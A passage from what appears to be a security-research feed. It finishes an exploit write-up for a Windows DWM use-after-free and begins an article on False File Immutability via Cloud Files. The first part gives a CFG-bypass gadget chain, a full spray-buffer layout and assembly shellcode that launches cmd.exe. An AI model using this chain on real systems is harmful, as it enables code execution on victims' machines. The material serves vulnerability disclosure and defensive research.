(*pcVar2)();  // call [[spray]+0x50] with RCX = spray
</code></pre>
<p><strong>Call site stack:</strong></p>
<pre><code>00 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xa9
01 dwmcore!CComposition::PreRender+0x99f
02 dwmcore!CComposition::ProcessComposition+0x1d7
03 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
04 dwmcore!CConnection::RunCompositionThread+0x142
05 KERNEL32!BaseThreadInitThunk+0x17
06 ntdll!RtlUserThreadStart+0x2c
</code></pre>
<p><strong>Register state at dispatch:</strong></p>
<ul>
<li><code>RCX</code> = pointer to sprayed object (our controlled 288 bytes)</li>
<li><code>RIP</code> = <code>[[spray]+0x50]</code> (function pointer from fake vtable)</li>
</ul>
<h3>Target Function Constraints</h3>
<p>There are initially two restrictions on what we can call:</p>
<ol>
<li>The target must be <strong>in the CFG bitmap</strong> (marked as valid call target)</li>
<li>The target must have a <strong>pointer to it</strong> (in IAT, vtable, or other readable memory)</li>
</ol>
<p>We cannot directly call arbitrary addresses; only functions that satisfy both conditions.</p>
<h3>Gadget Chain: __fnINSTRING + CStdAsyncStubBuffer2_Disconnect</h3>
<p>With the UAF giving us a controlled vtable call (<code>RIP = [[spray]+0x50]</code>, <code>RCX = spray</code>), the remaining challenge is chaining CFG-valid gadgets to achieve arbitrary code execution. Direct shellcode execution is blocked by CFG, and we have no heap address leak. We developed a novel gadget chain that solves both problems to achieve code execution, but it required two successful exploit attempts, lowering overall reliability. Therefore, we pivoted to a <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">known public</a> technique using two Windows system DLL gadgets: <code>__fnINSTRING</code> (user32.dll) and <code>CStdAsyncStubBuffer2_Disconnect</code> (combase.dll).</p>
<h4>Stage 1: __fnINSTRING - Kernel Callback Dispatch Without a Leak</h4>
<p>The Windows kernel communicates back to user mode through the <code>KernelCallbackTable</code> (KCT), a function pointer table stored in the PEB at offset <code>+0x58</code>. Each entry points to a <code>__fn*</code> handler in <code>user32.dll</code>. These functions are CFG-valid call targets and have pointers to them in readable memory (the KCT itself), satisfying both constraints.</p>
<p>We point the fake vtable at <code>&amp;KCT[fnINSTRING_index] - 0x50</code>. When DirtyActiveInk dereferences <code>[[spray]+0x50]</code>, it reads the KCT entry and dispatches to <code>__fnINSTRING</code>:</p>
<pre><code>[[spray]+0x50]
  = [KCT_entry_addr - 0x50 + 0x50]
  = [KCT_entry_addr]
  = &amp;__fnINSTRING
</code></pre>
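<p>The same arithmetic can be modeled on a flat buffer: aim the &quot;vtable&quot; 0x50 bytes before the slot you actually want read, and the dispatch that dereferences <code>+0x50</code> lands on it. The offsets match the article, while the table and function address below are stand-ins:</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Model of the vtable slide: fake_vtable = &amp;KCT[idx] - 0x50, so the
 * virtual call that reads [fake_vtable + 0x50] fetches the KCT entry. */
uint64_t read_dispatch_slot(void) {
    unsigned char region[0x58] = {0};
    uint64_t fn = 0x00007ffe11223344ULL;   /* stand-in for &amp;__fnINSTRING */
    memcpy(region + 0x50, &amp;fn, sizeof fn); /* the &quot;KCT entry&quot; lives here */
    unsigned char *fake_vtable = region;   /* entry address minus 0x50   */
    uint64_t out;
    memcpy(&amp;out, fake_vtable + 0x50, sizeof out);
    return out;                            /* what the UAF call targets  */
}
</code></pre>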
<p>What makes this useful is what <code>__fnINSTRING</code> does internally. It treats its argument (our spray buffer) as a <code>_CAPTUREBUF</code> structure and calls <code>FixupCallbackPointers</code> before dispatching the inner function. <code>FixupCallbackPointers</code> reads a fixup table from the buffer and converts relative offsets into absolute addresses by adding the buffer's base address:</p>
<pre><code class="language-c">// Simplified FixupCallbackPointers logic:
void FixupCallbackPointers(_CAPTUREBUF* buf) {
    if (buf-&gt;guard != 0) return;  // already fixed up - skip
    int32_t* fixups = (int32_t*)((char*)buf + buf-&gt;fixupTableOffset);
    for (int i = 0; i &lt; buf-&gt;fixupCount; i++) {
        int32_t* target = (int32_t*)((char*)buf + fixups[i]);
        *(uint64_t*)target += (uint64_t)buf;  // relative → absolute
    }
}
</code></pre>
<p>This eliminates the need for a heap address leak. We embed relative offsets in the spray buffer, and <code>FixupCallbackPointers</code> patches them to absolute pointers at runtime using the buffer's own address. After fixup, <code>__fnINSTRING</code> dispatches the inner function pointer at <code>+0x48</code> with the arguments at <code>+0x28</code> (RCX), <code>+0x30</code> (EDX), <code>+0x38</code> (R8), and <code>+0x50</code> (R9).</p>
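<p>The offset-patching trick can be modeled outside Windows. The following portable C sketch uses our own simplified stand-in for the <code>_CAPTUREBUF</code> header (field names and offsets are illustrative, not the real <code>user32.dll</code> layout) to show how a buffer seeded with relative offsets rewrites itself into absolute pointers once handed its own base address:</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Illustrative stand-in for the _CAPTUREBUF-style header: a guard word,
 * a fixup count, and the offset of a table of 32-bit relative offsets.
 * These fields and offsets are simplified for demonstration only. */
typedef struct {
    uint64_t guard;            /* nonzero once fixups have been applied */
    int32_t  fixupCount;
    int32_t  fixupTableOffset; /* offset of the fixup table within the buffer */
} capture_hdr;

/* Mirrors the simplified FixupCallbackPointers logic from the article:
 * each table entry names a slot in the buffer; adding the buffer's base
 * address to that slot turns a relative offset into an absolute pointer. */
static void fixup_pointers(void *buf)
{
    capture_hdr *hdr = (capture_hdr *)buf;
    if (hdr->guard != 0) return;  /* already fixed up - skip */
    int32_t *fixups = (int32_t *)((char *)buf + hdr->fixupTableOffset);
    for (int32_t i = 0; i < hdr->fixupCount; i++) {
        uint64_t *slot = (uint64_t *)((char *)buf + fixups[i]);
        *slot += (uint64_t)(uintptr_t)buf;  /* relative -> absolute */
    }
    hdr->guard = 1;  /* model the guard word so a second pass is a no-op */
}
```

<p>Seeding a slot with the relative value <code>0xC8</code> and running the fixup yields the absolute pointer <code>base+0xC8</code>, which is exactly how the exploit builds its fake objects without a leak.</p>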
<p>We set the inner function to <code>CStdAsyncStubBuffer2_Disconnect</code>.</p>
<h4>Stage 2: CStdAsyncStubBuffer2_Disconnect - Two Chained Vtable Calls</h4>
<p><code>CStdAsyncStubBuffer2_Disconnect</code> is exported from <code>combase.dll</code>, making it CFG-valid with a stable address. Its disassembly reveals a useful primitive: two sequential vtable dispatches with preserved argument registers:</p>
<pre><code>; CStdAsyncStubBuffer2_Disconnect (simplified)
MOV  RBX, RCX             ; save this
MOV  RCX, [RCX-8]         ; load [this-8] -&gt; fake_obj_1
TEST RCX, RCX
JZ   skip1
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x20]      ; vtable[4]
CALL guard_dispatch_icall  ; CALL #1: [[this-8]+0x20]  ← VirtualProtect

skip1:
XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; DEFUSE: read [this+0x10], zero it
TEST RCX, RCX
JZ   skip2
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x10]      ; vtable[2]
CALL guard_dispatch_icall  ; CALL #2: [[[this+0x10]]+0x10]  ← shellcode

skip2:
ADD  RSP, 0x20
POP  RBX
RET
</code></pre>
<p><code>RDX</code>, <code>R8</code>, and <code>R9</code> are <strong>preserved through both calls</strong>, arriving untouched from <code>__fnINSTRING</code>'s argument setup. This gives us full control over the first three arguments to both vtable calls.</p>
<h4>Vtable Call #1: VirtualProtect → RWX</h4>
<p>We construct a self-referential fake object at <code>+0xC8</code> in the spray buffer: <code>[+0xC8]</code> points to itself (after fixup), so dereferencing <code>[RCX] → [RCX+0x20]</code> reads <code>VirtualProtect</code>'s address from <code>+0xE8</code>. The arguments (preserved from <code>__fnINSTRING</code> dispatch) are:</p>
<table>
<thead>
<tr>
<th align="left">Register</th>
<th align="left">Value</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">RCX</td>
<td align="left">base+0xC8 (fake_obj_1)</td>
<td align="left">lpAddress (start of spray buffer region)</td>
</tr>
<tr>
<td align="left">RDX</td>
<td align="left">0x1000</td>
<td align="left">dwSize</td>
</tr>
<tr>
<td align="left">R8</td>
<td align="left">0x40</td>
<td align="left">flNewProtect (<code>PAGE_EXECUTE_READWRITE</code>)</td>
</tr>
<tr>
<td align="left">R9</td>
<td align="left">base+0xC0</td>
<td align="left">lpflOldProtect (output slot in spray buffer)</td>
</tr>
</tbody>
</table>
<p>After this call, the spray buffer's memory page is marked RWX, and the CFG bitmap is updated to allow execution from this region.</p>
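<p>The pointer walk for call #1 can be verified with a quick simulation. In this portable C sketch (buffer contents and the <code>VirtualProtect</code> stand-in value are simulated; the offsets match the spray layout described in this article), the self-referential entry at <code>+0xC8</code> resolves to whatever sits at <code>+0xE8</code>:</p>

```c
#include <assert.h>
#include <stdint.h>

/* Walk CALL #1's chain over a simulated spray buffer:
 *   RCX  = [this - 8]     -> fake_obj_1 (base+0xC8)
 *   vtbl = [RCX]          -> base+0xC8 again (self-referential)
 *   RAX  = [vtbl + 0x20]  -> [base+0xE8], the VirtualProtect slot
 * 'this' is base+0x80, as passed in from __fnINSTRING. */
static uint64_t resolve_call1(const unsigned char *base)
{
    const unsigned char *self = base + 0x80;
    uint64_t rcx  = *(const uint64_t *)(self - 0x8);     /* [base+0x78] */
    uint64_t vtbl = *(const uint64_t *)(uintptr_t)rcx;   /* [base+0xC8] */
    return *(const uint64_t *)(uintptr_t)(vtbl + 0x20);  /* [base+0xE8] */
}
```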
<h4>Vtable Call #2: Inline Shellcode</h4>
<p>After VirtualProtect returns, Disconnect loads <code>[this+0x10]</code> into RCX for the second vtable dispatch:</p>
<pre><code>XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; RCX = [base+0x90] = base+0xA0 (fake_obj_2)
TEST RCX, RCX
JZ   skip2                 ; non-zero → take the call
MOV  RAX, [RCX]            ; RAX = [base+0xA0] = base+0xA8 (fake vtable_2)
MOV  RAX, [RAX+0x10]       ; RAX = [base+0xB8] = base+0xD0 (shellcode!)
CALL guard_dispatch_icall   ; call base+0xD0
</code></pre>
<p>The pointer chain resolves step by step:</p>
<ol>
<li><code>[this+0x10]</code> = <code>[base+0x90]</code> = <code>base+0xA0</code> (fake_obj_2)</li>
<li><code>[RCX]</code> = <code>[base+0xA0]</code> = <code>base+0xA8</code>, fake_obj_2's vtable pointer (after fixup)</li>
<li><code>[RAX+0x10]</code> = <code>[base+0xB8]</code> = <code>base+0xD0</code>, vtable_2's third entry, pointing at our shellcode</li>
</ol>
<p>The final <code>CALL guard_dispatch_icall</code> dispatches to <code>base+0xD0</code>, our inline shellcode, now both executable and CFG-valid thanks to the preceding VirtualProtect call.</p>
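<p>The same kind of simulation confirms the second dispatch. This portable C sketch (simulated buffer; offsets copied from the chain above) follows <code>[this+0x10]</code> to the fake vtable and lands on the shellcode slot at <code>+0xD0</code>:</p>

```c
#include <assert.h>
#include <stdint.h>

/* Resolve CALL #2's pointer chain over a simulated spray buffer:
 *   RCX    = [this + 0x10]  (fake_obj_2)
 *   RAX    = [RCX]          (fake vtable_2)
 *   target = [RAX + 0x10]   (vtable_2's third entry)
 * 'this' is base+0x80, as set up by the __fnINSTRING dispatch. */
static uint64_t resolve_call2(const unsigned char *base)
{
    const unsigned char *self = base + 0x80;           /* Disconnect's this */
    uint64_t rcx = *(const uint64_t *)(self + 0x10);   /* [base+0x90] */
    uint64_t rax = *(const uint64_t *)(uintptr_t)rcx;  /* fake vtable_2 */
    return *(const uint64_t *)(uintptr_t)(rax + 0x10); /* call target */
}
```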
<h5>Shellcode Layout</h5>
<p>The shellcode is split into two phases because the VirtualProtect address data sits at <code>+0xE8</code> (used as <code>vtable_1[0x20]</code> by call #1), creating a gap in the middle of our executable region:</p>
<p><strong>Phase 1 (+0xD0, 22 bytes):</strong> Saves <code>RCX</code> (base+0xA0) into <code>RBX</code> for later address arithmetic, allocates shadow space, loads <code>SW_SHOW</code> (5) into <code>RDX</code>, loads the absolute address of <code>WinExec</code> via <code>movabs RAX</code>, then jumps over the 8-byte data gap at <code>+0xE8</code>:</p>
<pre><code>mov  rbx, rcx              ; save base+0xA0 for address math
sub  rsp, 0x28             ; shadow space
push 5
pop  rdx                   ; uCmdShow = SW_SHOW
movabs rax, &lt;WinExec addr&gt; ; 10-byte immediate load
jmp  +0x0A                 ; skip over +0xE8 data → land at +0xF0
</code></pre>
<p><strong>Phase 2 (+0xF0):</strong> Calls <code>WinExec</code> with a <code>RIP</code>-relative pointer to the <code>&quot;cmd.exe\0&quot;</code> string embedded at the end of the shellcode, defuses the spray for safe re-entry, then performs a stack fixup to return directly to DWM's composition loop:</p>
<pre><code>lea  rcx, [rip+0x22]      ; rcx = &amp;&quot;cmd.exe&quot;
call rax                   ; WinExec(&quot;cmd.exe&quot;, SW_SHOW)

; Defuse: rewrite fake vtable so re-entry is harmless
lea  rax, [rbx+0x78]       ; rax = address of the ret below
mov  [rbx-0x48], rax       ; [base+0x58] = ret_gadget
lea  rax, [rbx-0x98]       ; rax = base+0x08
mov  [rbx-0xA0], rax       ; [base+0x00] = base+0x08 (new fake vtable)

; Stack fixup: skip Disconnect + __fnINSTRING return frames
add  rsp, 0xB8             ; 0x28 shadow + 0x90 to unwind past intermediate frames
xor  eax, eax              ; zero return value
ret                        ; return directly to DWM composition loop
; &quot;cmd.exe\0&quot; embedded here
</code></pre>
<p>The <code>add rsp, 0xB8</code> improves reliability. A naive <code>add rsp, 0x28</code> would return into <code>CStdAsyncStubBuffer2_Disconnect</code>, which would then return into <code>__fnINSTRING</code>, which calls <code>NtCallbackReturn</code>. This kernel callback return path can be fragile in the context of a hijacked call. By adding an extra <code>0x90</code> to the stack adjustment, the shellcode skips past both intermediate frames entirely and returns directly to <code>DirtyActiveInk</code>'s caller in the DWM composition loop.</p>
<h4>Safe Re-entry: Defusing the Spray</h4>
<p>DWM's <code>DirtyActiveInk</code> may iterate the dangling pointer more than once. Without defusing, each re-entry would re-trigger the full chain and crash. The shellcode rewrites the spray's vtable pointer so that subsequent dereferences take a harmless path:</p>
<ol>
<li><code>[base+0x00]</code> is overwritten to <code>base+0x08</code> (new fake vtable)</li>
<li><code>[base+0x58]</code> is overwritten to the address of a <code>ret</code> instruction</li>
</ol>
<p>On re-entry: <code>[[base+0x00]+0x50] = [base+0x08+0x50] = [base+0x58] = ret</code>. The vtable call returns immediately. <code>__fnINSTRING</code> is never re-invoked because the vtable no longer points at the KCT entry.</p>
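<p>A small check (portable C, simulated buffer) confirms that the defused layout short-circuits: the same <code>[[base+0x00]+0x50]</code> dispatch that originally reached the KCT entry now resolves to the <code>ret</code> gadget slot:</p>

```c
#include <assert.h>
#include <stdint.h>

/* DirtyActiveInk's dispatch: RIP = [[base + 0x00] + 0x50].
 * After defusing, [base+0x00] = base+0x08, so the dispatch reads
 * [base+0x58], which the shellcode pointed at a lone ret instruction. */
static uint64_t resolve_dirty_ink(const unsigned char *base)
{
    uint64_t vtbl = *(const uint64_t *)(base + 0x00);
    return *(const uint64_t *)(uintptr_t)(vtbl + 0x50);
}
```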
<h3>Complete Spray Layout</h3>
<p>The full 288-byte spray buffer (18 RECTs) after <code>FixupCallbackPointers</code>:</p>
<table>
<thead>
<tr>
<th align="left">Offset</th>
<th align="left">Size</th>
<th align="left">Content</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">+0x00</td>
<td align="left">8</td>
<td align="left">KCT_entry - 0x50</td>
<td align="left">Fake vtable → <code>__fnINSTRING</code></td>
</tr>
<tr>
<td align="left">+0x08</td>
<td align="left">4</td>
<td align="left">8</td>
<td align="left">Fixup count</td>
</tr>
<tr>
<td align="left">+0x18</td>
<td align="left">4</td>
<td align="left">0x58</td>
<td align="left">Fixup table offset</td>
</tr>
<tr>
<td align="left">+0x20</td>
<td align="left">8</td>
<td align="left">base (fixup'd)</td>
<td align="left">Guard (blocks re-fixup)</td>
</tr>
<tr>
<td align="left">+0x28</td>
<td align="left">8</td>
<td align="left">base+0x80 (fixup'd)</td>
<td align="left">RCX → Disconnect <code>this</code></td>
</tr>
<tr>
<td align="left">+0x30</td>
<td align="left">4</td>
<td align="left">0x1000</td>
<td align="left">EDX → VirtualProtect <code>dwSize</code></td>
</tr>
<tr>
<td align="left">+0x38</td>
<td align="left">8</td>
<td align="left">0x40</td>
<td align="left">R8 → PAGE_EXECUTE_READWRITE</td>
</tr>
<tr>
<td align="left">+0x48</td>
<td align="left">8</td>
<td align="left">&amp;Disconnect</td>
<td align="left">Inner function pointer</td>
</tr>
<tr>
<td align="left">+0x50</td>
<td align="left">8</td>
<td align="left">base+0xC0 (fixup'd)</td>
<td align="left">R9 → <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0x58</td>
<td align="left">32</td>
<td align="left">fixup table (8 entries)</td>
<td align="left">Offsets to patch</td>
</tr>
<tr>
<td align="left">+0x78</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">[this-8] → fake_obj_1</td>
</tr>
<tr>
<td align="left">+0x80</td>
<td align="left">8</td>
<td align="left">(unused)</td>
<td align="left">Disconnect <code>this</code> base</td>
</tr>
<tr>
<td align="left">+0x90</td>
<td align="left">8</td>
<td align="left">base+0xA0 (fixup'd)</td>
<td align="left">[this+0x10] → fake_obj_2</td>
</tr>
<tr>
<td align="left">+0xA0</td>
<td align="left">8</td>
<td align="left">base+0xA8 (fixup'd)</td>
<td align="left">fake_obj_2 vtable</td>
</tr>
<tr>
<td align="left">+0xB8</td>
<td align="left">8</td>
<td align="left">base+0xD0 (fixup'd)</td>
<td align="left">vtable_2[0x10] → shellcode</td>
</tr>
<tr>
<td align="left">+0xC0</td>
<td align="left">4</td>
<td align="left">(output)</td>
<td align="left">VirtualProtect <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0xC8</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">Self-referential vtable (fake_obj_1)</td>
</tr>
<tr>
<td align="left">+0xD0</td>
<td align="left">22</td>
<td align="left">shellcode phase 1</td>
<td align="left">Save regs, load WinExec, jmp</td>
</tr>
<tr>
<td align="left">+0xE8</td>
<td align="left">8</td>
<td align="left">&amp;VirtualProtect</td>
<td align="left">vtable_1[0x20] data</td>
</tr>
<tr>
<td align="left">+0xF0</td>
<td align="left">48</td>
<td align="left">shellcode phase 2</td>
<td align="left">WinExec + defuse + stack fixup + &quot;cmd.exe\0&quot;</td>
</tr>
</tbody>
</table>
<h3>Full Chain Summary</h3>
<pre><code>DirtyActiveInk iterates dangling pointer
  → [[spray+0x00]+0x50] = __fnINSTRING(spray)
    → FixupCallbackPointers: 8 relative offsets → absolute
    → Dispatch: CStdAsyncStubBuffer2_Disconnect(base+0x80, 0x1000, 0x40, base+0xC0)
      → Vtable call #1: VirtualProtect(base+0xC8, 0x1000, RWX, base+0xC0)
        → Spray buffer page is now RWX, CFG bitmap updated
      → Vtable call #2: shellcode at base+0xD0
        → WinExec(&quot;cmd.exe&quot;, SW_SHOW)
        → Defuse: rewrite vtable for safe re-entry
        → Stack fixup: add rsp, 0xB8 to skip Disconnect + __fnINSTRING frames
      → RET directly to DWM composition loop
    → DirtyActiveInk re-entry: [[base]+0x50] = ret → clean return
</code></pre>
<p>The DWM process runs as the DWM user with System integrity. Prior <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">public techniques</a> to achieve SYSTEM typically involve hijacking function pointers mapped into privileged client processes like LogonUI or Consent. However, it appears this technique was recently patched, as the shared section is now mapped read-only. We developed a new, alternative path to SYSTEM but have chosen not to publish it at this time.</p>
<div class="youtube-video-container">
  <iframe src="https://www.youtube.com/embed/SR4242l_kw0?si=lIQFQ8xThl_Nmt0w" title="YouTube video player" allow="fullscreen; accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h2>Closing Thoughts</h2>
<p>The models we have today are highly capable at tasks that historically required deep expertise cultivated over many years, including reverse engineering, vulnerability discovery, and exploit development. Their capabilities are spiky and do not yet rival the world's best in these fields, but model progress shows no sign of slowing down. This levels the playing field for defenders, while also raising the capabilities of attackers.</p>
<p>The adversarial cat-and-mouse game is nothing new, but attackers hold at least a near-term asymmetric advantage in wielding these tools for harm: they can move faster, with little concern for the safety or security of AI systems. Defenders must leverage AI offensively against their own code (for vulnerabilities), security products (for detection gaps), and enterprises (adversary emulation) to find weaknesses and iterate on improved defenses before attackers do.</p>
<p>Unfortunately, it may be small organizations with no security teams that take the brunt of the near-term pain. My hope is that, long term, the security community can together outspend attackers on offensive and defensive research, and we exit this era in a better place than we started.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/patch-diff-to-system/patch-diff-to-system.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[The Immutable Illusion: Pwning Your Kernel with Cloud Files]]></title>
            <link>https://www.elastic.co/kr/security-labs/immutable-illusion</link>
            <guid>immutable-illusion</guid>
            <pubDate>Fri, 20 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat actors can abuse a class of vulnerabilities to bypass security restrictions and break trust chains.]]></description>
            <content:encoded><![CDATA[<p>In 2024, we disclosed a new Windows vulnerability class, <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">False File Immutability</a> (FFI), which previously demonstrated how <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-">network redirectors</a> could be leveraged to violate incorrect assumptions in the design of Windows Code Integrity, resulting in a pair of kernel exploits. These exploits relied on Windows network drives, adding complexity and creating a choke-point in the kill chain that allowed for easier detection and mitigation.</p>
<p>This research presents an advancement by introducing a more streamlined and self-contained method of exploitation. The novel approach leverages a built-in Windows capability to achieve the same file modification bypass, without the complexities of SMB setups. By analyzing how the kernel driver for this capability processes file data, we uncover a security bypass that enables an attacker to modify files that Windows incorrectly assumes are immutable, leading to a proof-of-concept kernel exploit.</p>
<p>Key Takeaways:</p>
<ul>
<li><strong>No Network Redirector Needed:</strong> Unlike prior exploits, the new method exploits False File Immutability without requiring Windows file sharing.</li>
<li><strong>Built-in Capability Exploited:</strong> The exploit leverages a security bypass within a built-in Windows capability that handles cloud file synchronization.</li>
<li><strong>Immutability Violated:</strong> It enables modification of files that the Windows kernel and memory manager incorrectly assume are immutable, leading to a kernel exploit.</li>
<li><strong>Mitigation Bypassed:</strong> It enables attackers to bypass a mitigation that Microsoft created specifically for a prior FFI exploit.</li>
<li><strong>Forever-Day:</strong> Microsoft chose to only patch this exploit in some versions of Windows, so it remains functional on several fully-patched versions of Windows in <a href="https://learn.microsoft.com/en-us/lifecycle/policies/fixed#mainstream-support">Mainstream Support</a> as of February 2026.</li>
</ul>
<h2>False file immutability</h2>
<p><em>You may remember False File Immutability from <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">our recent article</a> and <a href="https://www.youtube.com/watch?v=1LvOFU1u-eo">BlueHat IL 2024 talk</a>, but if not, then this section should help refresh your memory. If you’re already familiar, feel free to skip to the next section.</em></p>
<p>When an application opens a file on Windows, it typically uses some form of the Win32 <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew">CreateFile</a> API.</p>
<pre><code class="language-c">HANDLE CreateFileW(
  [in]           LPCWSTR               lpFileName,
  [in]           DWORD                 dwDesiredAccess,
  [in]           DWORD                 dwShareMode,
  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [in]           DWORD                 dwCreationDisposition,
  [in]           DWORD                 dwFlagsAndAttributes,
  [in, optional] HANDLE                hTemplateFile
);
</code></pre>
<p>Callers of <code>CreateFile</code> specify the access they want in <code>dwDesiredAccess</code>. For example, a caller would pass <code>FILE_READ_DATA</code> to be able to read data, or <code>FILE_WRITE_DATA</code> to be able to write data. The full set of access rights are <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants">documented</a> on the Microsoft Learn website.</p>
<p>In addition to passing <code>dwDesiredAccess</code>, callers must pass a “sharing mode” in <code>dwShareMode</code>, which consists of zero or more of <code>FILE_SHARE_READ</code>, <code>FILE_SHARE_WRITE</code>, and <code>FILE_SHARE_DELETE</code>. You can think of a sharing mode as the caller declaring “I’m okay with others doing X to this file while I’m using it,” where X could be reading, writing, or renaming. For example, a caller that passes <code>FILE_SHARE_WRITE</code> allows others to write the file while they are working with it.</p>
<p>As a file is opened, the caller’s <code>dwDesiredAccess</code> is tested against the <code>dwShareMode</code> of all existing file handles. Simultaneously, the caller’s <code>dwShareMode</code> is tested against the previously-granted <code>dwDesiredAccess</code> of all existing handles to that file. If either of these tests fails, then CreateFile fails with a sharing violation.</p>
<p>Sharing isn’t mandatory. Callers can pass a share mode of zero to obtain exclusive access. Per Microsoft <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/creating-and-opening-files">documentation</a>:</p>
<blockquote>
<p>An open file that is not shared (<code>dwShareMode</code> set to zero) cannot be opened again, either by the application that opened it or by another application, until its handle has been closed. This is also referred to as exclusive access.</p>
</blockquote>
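<p>The two-way test maps directly to code. The sketch below is a simplified, portable C model of the sharing check (our own helper names; only read, write, and delete access are modeled, using the documented <code>FILE_*</code> constant values), showing why a file opened without <code>FILE_SHARE_WRITE</code> refuses later writers:</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Documented Windows constant values; only read/write/delete are modeled. */
#define FILE_READ_DATA    0x0001
#define FILE_WRITE_DATA   0x0002
#define DELETE            0x00010000
#define FILE_SHARE_READ   0x1
#define FILE_SHARE_WRITE  0x2
#define FILE_SHARE_DELETE 0x4

typedef struct { uint32_t access; uint32_t share; } open_handle;

/* Which FILE_SHARE_* bits an existing handle must have granted for a
 * given desired access to be compatible with it. */
static uint32_t required_share(uint32_t desired_access)
{
    uint32_t req = 0;
    if (desired_access & FILE_READ_DATA)  req |= FILE_SHARE_READ;
    if (desired_access & FILE_WRITE_DATA) req |= FILE_SHARE_WRITE;
    if (desired_access & DELETE)          req |= FILE_SHARE_DELETE;
    return req;
}

/* A new open succeeds only if (a) every existing handle shares what the
 * caller wants to do, and (b) the caller shares what every existing
 * handle was already granted. */
static bool open_allowed(const open_handle *existing, int n,
                         uint32_t desired_access, uint32_t share_mode)
{
    for (int i = 0; i < n; i++) {
        uint32_t need_from_them = required_share(desired_access);
        if ((existing[i].share & need_from_them) != need_from_them)
            return false;  /* they didn't share what we want to do */
        uint32_t need_from_us = required_share(existing[i].access);
        if ((share_mode & need_from_us) != need_from_us)
            return false;  /* we don't share what they're already doing */
    }
    return true;
}
```

<p>In this model, a handle opened for read without <code>FILE_SHARE_WRITE</code> (as when the loader maps an image) causes any later open requesting <code>FILE_WRITE_DATA</code> to fail the first test with a sharing violation.</p>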
<p>Sharing is enforced by the filesystem, typically NTFS, but Windows supports other filesystems such as FAT32. Windows itself omits <code>FILE_SHARE_WRITE</code> when opening certain types of files, preventing modification while they are in use. Such unmodifiable files can be considered <a href="https://www.merriam-webster.com/dictionary/immutable"><strong>immutable</strong></a>.</p>
<p>In some situations, the memory manager relies on this immutability. If a page fault occurs within an immutable memory-mapped file, and that page hasn’t been modified, then the memory manager can read that page’s contents directly out of the original backing file. It needn’t save a second copy of the file’s contents to the <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-client/performance/introduction-to-the-page-file">pagefile</a> because immutability ensures that the file on disk cannot be changed. Executables running in memory, such as EXEs and DLLs, are immutable, so the memory manager can apply this optimization to them.</p>
<p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-">Network redirectors</a> allow the use of network paths with any API that accepts file paths. This is very convenient, allowing users and applications to easily work with files and run programs off network drives. The kernel transparently redirects any I/O to the remote machine. If a program is launched from a network drive, any EXEs and its DLLs will be transparently pulled from the network as needed.</p>
<p>When a network redirector is in use, the server on the other end of the pipe needn’t be a Windows machine. It could be a Linux machine running <a href="https://en.wikipedia.org/wiki/Samba_(software)">Samba</a>, or even a Python <a href="https://github.com/fortra/impacket/blob/d71f4662eaf12c006c2ea7f5ec09b418d9495806/examples/smbserver.py">Impacket script</a> that “speaks” the <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB network protocol</a>. This means the server doesn’t have to honor Windows filesystem sharing semantics. An attacker can employ a network redirector to modify “immutable” files server-side, bypassing sharing restrictions. This means that these files are incorrectly assumed to be immutable. This is a vulnerability class that we are calling <strong>False File Immutability</strong> (FFI).</p>
<h2>Cloud files</h2>
<p>Imagine leaving the house to start your day, and there’s a package on your step. It’s that sweet Surface Book you ordered last week. Excited but short on time, you throw it into your bag and head to the gym. After working out to sick beats on your Zune, you head to the local Redmond coffee shop to meet up with a friend you met on Xbox Live. Unfortunately, they’re running late, so you crack open your brand new Surface Book and log into Windows, eager to set up Recall. Despite the mediocre coffee shop Wi-Fi, somehow your entire 1TB OneDrive immediately appears before you. There’s no way you could have downloaded 1TB that quickly, so there must be some witchcraft going on. That witchcraft is <a href="https://learn.microsoft.com/en-us/windows/win32/cfapi/cloud-files-api-portal">Cloud Files</a>.</p>
<p>Introduced in Windows 10 version 1709, Cloud Files enables user-mode applications like OneDrive to register as <a href="https://learn.microsoft.com/en-us/windows/win32/cfapi/build-a-cloud-file-sync-engine">Cloud Sync Providers</a> and create empty “placeholder” files on the system. Initially, these placeholders are dehydrated (empty). As you access them, the I/O is intercepted by the CloudFiles kernel driver (<code>cldflt.sys</code>), which calls into the provider’s process. The provider can then retrieve the file’s contents from the cloud. It doesn't need to download the entire file at once. If you only need 1MB, it can retrieve just that 1MB. As you request more of the file, it can continue to rehydrate (fill in) the file contents as needed.</p>
